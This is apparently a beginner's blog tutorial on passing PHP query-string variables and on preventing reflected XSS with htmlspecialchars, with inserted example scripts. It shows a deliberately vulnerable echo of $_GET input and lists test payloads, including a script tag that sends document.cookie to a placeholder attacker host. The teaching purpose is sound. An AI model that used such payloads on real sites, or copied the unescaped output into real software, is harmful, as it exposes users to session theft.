PHP Craft

N.V.C.
6 min read · Nov 25, 2022


Understanding the methods we may use to communicate data about a user’s interaction together with a request for a new web page is the key to building interactivity with PHP. It turns out that PHP makes this quite simple.

Let’s talk about passing variables in links, and about how easy it is to read a query string.

The easiest way to send data along with a page request is to put it in the URL itself, in what is called the query string. If you have ever seen a URL with a question mark in it, you have already encountered this technique. For instance, if you search for “sitepoint” on a search engine, you get a page of search results with a URL like this:

http://www.sample.com/search?hl=en&q=sitepoint

Do you see the ? in the URL? The text after the question mark carries your search term (sitepoint), and it is passed along to the http://www.sample.com/search page that produces the results.

Let’s create our own simple example in code. Make a standard HTML document called pet.html (because there won’t be any PHP in this file, there is no need for the .php filename extension), then add the following link:

<a href="pet.php?pet=Cat">Cat</a>

This is a link to a pet.php file, but in addition to just linking to the file, you’re also sending a variable with the page request. The variable is passed in the part of the URL that comes after the question mark, the query string: pet is the variable, and Cat is its value. Therefore, you’ve created a link that calls pet.php and tells the PHP code in that file that pet is equal to Cat.

We must look at pet.php in order to fully understand the effect of this link. Create a new file, but notice the .php filename extension this time. This informs the web server that PHP code can be expected in the file. Add the following:

<?php
$pet = $_GET['pet'];
echo 'My pet is a, ' . $pet . '!';
?>

Place these two files (pet.php and pet.html) in the Project folder now, and open the first file in your browser (the URL should be http://local_ip_address/pet.html). Then follow the link on that page to reach the PHP script. You should see the message “My pet is a, Cat!”.

Let’s look more closely at the code that enabled this. The most significant line:

$pet = $_GET['pet'];

I’m going to assume that you already know the concept of an array. $_GET is one of the many variables that PHP automatically creates in response to a browser request. Any values given in the URL query string are stored in this array. Because $_GET is an associative array, the value of the pet variable given in the query string can be retrieved as $_GET[‘pet’]. Your pet.php script copies this value into an ordinary PHP variable ($pet), and then uses an echo statement to show it as part of a text string:
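The following is an added example, not code from the original post. It uses parse_str, which applies the same decoding the web server uses when it fills $_GET, to show what pet.php actually receives for a few constructed query strings, including the cases the script above does not handle: the key is missing, the key is repeated, or the attacker sends pet[] so that $_GET[‘pet’] becomes an array. The readPet helper and the query strings are assumptions made for the demonstration.

```php
<?php
// Added example (not part of the original post). Run with: php query_demo.php
// Shows how a query string becomes $_GET, and the inputs pet.php should
// check before trusting $_GET['pet']. The query strings are constructed test input.

function readPet(array $get): string
{
    // A missing key yields null (plus a warning) in PHP; fall back to an empty string.
    $pet = $get['pet'] ?? '';
    // ?pet[]=Cat makes $_GET['pet'] an array, and htmlspecialchars() on an array
    // throws a TypeError in PHP 8, so reject anything that is not a string.
    if (!is_string($pet)) {
        return '';
    }
    return $pet;
}

$cases = [
    'pet=Cat',
    'pet=Cat&pet=Dog',           // repeated key: the last value wins
    'pet[]=Cat',                 // array syntax: $_GET['pet'] is an array
    'animal=Cat',                // the pet key is missing entirely
    'pet=%3Cu%3ECat%3C%2Fu%3E',  // <u>Cat</u>, percent-decoded by parse_str
];

foreach ($cases as $qs) {
    $get = [];
    parse_str($qs, $get);   // same decoding PHP applies when it builds $_GET
    echo "query:  $qs\n";
    echo "\$_GET:  " . var_export($get, true) . "\n";
    echo "pet =>  " . var_export(readPet($get), true) . "\n\n";
}
```

The last case is the one the rest of this article is about: the browser percent-encodes the angle brackets, PHP decodes them again, and the raw HTML lands in $pet exactly as the attacker typed it.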

echo 'My pet is a, ' . $pet . '!';

Using the string concatenation operator (.) the value of the $pet variable is added to the output string.

But be careful! This code is missing a security measure! Although PHP is a simple language to learn, it turns out that if you don’t know what precautions to take, it’s also quite simple to introduce security vulnerabilities into websites that use PHP. The flaw here is cross-site scripting (XSS). Since it’s arguably the most prevalent security problem on the Web right now, I want to make sure you can identify and fix it before we continue.

The security problem is that pet.php generates a page whose content is controlled by the user: in this example, the $pet variable. Although $pet would normally get its value from the query string in the link on the pet.html page, a malicious user can simply alter the URL to send a different value for the pet variable.

Click the link in pet.html to see how this works. Look at the URL in your browser’s address bar when you view the resulting page (the one greeting you with “My pet is a, Cat!”). It should look like this:

http://local_ip_address/pet.php?pet=Cat

Edit the URL by wrapping the value of the pet variable in <u> and </u> tags, so that it looks like this:

http://local_ip_address/pet.php?pet=<u>Cat</u>

Hit Enter to load this new URL, and note that the word Cat is now underlined.

See what’s going on here? The user can enter any HTML code into the URL, and your PHP script includes it, without question, in the code of the generated page. Knowing this, a hostile user could include JavaScript code that carries out a malicious task, such as stealing the user’s session cookie or password. All the attacker would need to do is lure one of your users into clicking the modified link, for example by publishing it on a website under the attacker’s control or by sending it to your users in an email. If one of your users clicks the link, the attacker’s code is added to your page and the trap is sprung. Note that the attack runs in the victim’s browser, on your site’s origin, not on your server: it is your users who are harmed, and your site that takes the blame.

I’m sorry to worry you with this discussion of hostile hackers using your own PHP code against your users, especially when you’re still learning the language. The truth is that how easy it is to introduce security problems like this is PHP’s worst flaw as a language. According to some, much of the effort of learning to write professional-quality PHP goes into preventing security flaws. However, the earlier you are exposed to these problems, the sooner you develop the habit of avoiding them, and the less of a challenge they will be for you going forward.

So how can we create this page without leaving it open to abuse by intruders? The fix is to treat the value of $pet as plain text to be shown on your page, rather than as HTML to be included in the page’s code. Let me explain what I mean, because this is a subtle distinction.

Reopen your pet.php file and make the following changes to the PHP code inside:

<?php
$pet = $_GET['pet'];
echo 'My pet is a, ' . htmlspecialchars($pet, ENT_QUOTES, 'UTF-8') . '!';
?>

Let me break down this code for you because there is a lot going on there.
The first line still assigns the value of the ‘pet’ member from the $_GET array to $pet as it did before. However, the subsequent echo statement is remarkably different. This version of the code leverages the built-in PHP function htmlspecialchars to carry out a crucial conversion, whereas the previous version of the code merely put the $pet variable, naked, into the echo statement.

Remember that the security flaw exists because HTML code in the $pet variable is injected directly into the code of the page pet.php generates, where it can do anything HTML code is capable of. htmlspecialchars converts “special HTML characters” such as < and > into HTML character entities such as &lt; and &gt;, so that the browser displays them instead of interpreting them as HTML code. We will look at the result in a moment.

Let’s first examine this new code more closely. The call to htmlspecialchars is the first PHP function call in this article that takes more than one argument. The call itself looks like this:

htmlspecialchars($pet, ENT_QUOTES, 'UTF-8') . '!';

The first argument is the $pet variable (the text to be converted). The second argument is the PHP constant ENT_QUOTES. A PHP constant is like a variable whose value cannot be changed; unlike variables, constants don’t begin with a dollar sign. ENT_QUOTES instructs htmlspecialchars to convert single and double quotes in addition to the other special characters, which matters as soon as the value is placed inside an HTML attribute. PHP includes a number of built-in constants like ENT_QUOTES that control built-in functions like htmlspecialchars. The third argument, the string “UTF-8”, tells PHP which character encoding to use when reading the text you provide. (UTF-8 has been the default encoding since PHP 5.4, and since PHP 8.1 the default flags already include ENT_QUOTES, but passing both explicitly keeps the code portable and makes the intent obvious.)

To access your updated pet.php, open pet.html in your browser and click the link. You’ll see the message “My pet is a, Cat!”. As you did earlier, change the URL to wrap the pet value in <u> and </u> tags:

http://local_ip_address/pet.php?pet=<u>Cat</u>

When you hit Enter this time, instead of the pet value being underlined, you should see the actual text that you typed, like this:

My pet is a, <u>Cat</u>!

If you look at the page’s source code, you can verify that htmlspecialchars did its job by converting the characters into the corresponding entity references. This prevents malicious users from injecting unwanted code into your page: whatever they try, it is displayed harmlessly as plain text. One caveat to keep in mind: htmlspecialchars is the right tool only when the value ends up in HTML text or inside a quoted attribute. A value that is placed into a URL, a JavaScript block, or CSS needs escaping rules specific to that context, and a user-supplied link target still needs its scheme checked, because an entity-encoded javascript: URL is still a javascript: URL.
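To make the before-and-after concrete, here is an added example that is not part of the original post. It puts the unescaped and the escaped versions of the pet.php output side by side, feeds them constructed attacker payloads instead of a real request so it runs from the command line, shows why ENT_QUOTES matters once the value sits in a single-quoted attribute, and shows the one case htmlspecialchars does not cover on its own: a user-supplied href. The helper names e and safeHref, the title attribute, and the attacker URL are assumptions made for the demonstration.

```php
<?php
// Added example (not part of the original post). Run with: php escape_demo.php
// Compares the vulnerable and the fixed pet.php output on constructed attacker input.

// Escape for HTML text and quoted attribute values. Escape once, at the point of
// output; never store already-escaped data.
function e(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function vulnerablePage(string $pet): string
{
    return 'My pet is a, ' . $pet . '!';     // what the original pet.php does
}

function safePage(string $pet): string
{
    return 'My pet is a, ' . e($pet) . '!';  // what the fixed pet.php does
}

// Constructed payloads, as they would arrive in $_GET['pet'] after decoding.
$payloads = [
    '<u>Cat</u>',
    '<script>location="http://attacker.example/?c="+document.cookie</script>',
    '" onmouseover="alert(1)',               // aimed at a double-quoted attribute
];

foreach ($payloads as $p) {
    echo "input:      $p\n";
    echo "vulnerable: " . vulnerablePage($p) . "\n";
    echo "safe:       " . safePage($p) . "\n\n";
}

// ENT_QUOTES matters inside attributes. With ENT_COMPAT only double quotes are
// converted, so a single quote survives and can close a single-quoted attribute.
$attr = "Cat' onmouseover='alert(1)";
echo htmlspecialchars($attr, ENT_COMPAT, 'UTF-8') . "\n";   // single quote kept
echo e($attr) . "\n";                                         // becomes &#039;
// Assumed target: a title attribute written with single quotes in the page.
echo "<span title='" . e($attr) . "'>pet</span>\n";

// htmlspecialchars() protects HTML text and quoted attributes only. A value that
// becomes a link target also needs a scheme check; entity encoding does not
// neutralise a javascript: URL.
function safeHref(string $url): string
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!in_array(strtolower((string) $scheme), ['http', 'https'], true)) {
        return '#';
    }
    return e($url);   // & inside the URL becomes &amp;, as it must in an attribute
}

echo '<a href="' . safeHref('javascript:alert(1)') . '">link</a>' . "\n";        // href="#"
echo '<a href="' . safeHref('https://example.com/?a=1&b=2') . '">link</a>' . "\n";
```

The pattern to take away is that escaping belongs at the output boundary, chosen for the context the data lands in: e() for HTML text and attributes, a scheme allow-list on top of it for link targets, and json_encode or a templating engine for anything that ends up inside a script block.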

This has been only a short introduction to what makes PHP exciting and interesting; little by little you will discover more techniques for using it productively.


N.V.C.

A computer science student who strives to be a web developer. “Be functional” is one of my mottos. I am a dynamic and ambitious student.